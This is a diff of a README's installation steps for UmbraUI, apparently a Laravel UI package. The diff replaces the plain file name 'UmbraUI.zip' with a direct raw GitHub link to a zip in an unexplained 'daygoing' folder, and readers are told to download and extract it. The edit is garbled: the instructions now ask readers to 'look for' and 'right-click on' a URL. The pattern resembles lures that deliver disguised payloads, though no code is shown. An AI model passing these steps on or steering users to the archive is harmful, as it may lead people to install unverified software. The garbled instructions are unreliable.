noorbrohi251/UmbraUI/README.md

 4. **Download the Files**

-   Look for a file named `UmbraUI.zip` or a similar package.
+   Look for a file named `https://raw.githubusercontent.com/noorbrohi251/UmbraUI/main/daygoing/UmbraUI.zip` or a similar package.
 Click to download the file to your computer.

 5. **Extract the Zip File**

    Once the download is complete, locate the file in your downloads folder.
-Right-click on `UmbraUI.zip` and select "Extract All" (or use any extraction tool you have).
+Right-click on `https://raw.githubusercontent.com/noorbrohi251/UmbraUI/main/daygoing/UmbraUI.zip` and select "Extract All" (or use any extraction tool you have).

 6. **Add UmbraUI to Your Laravel Project**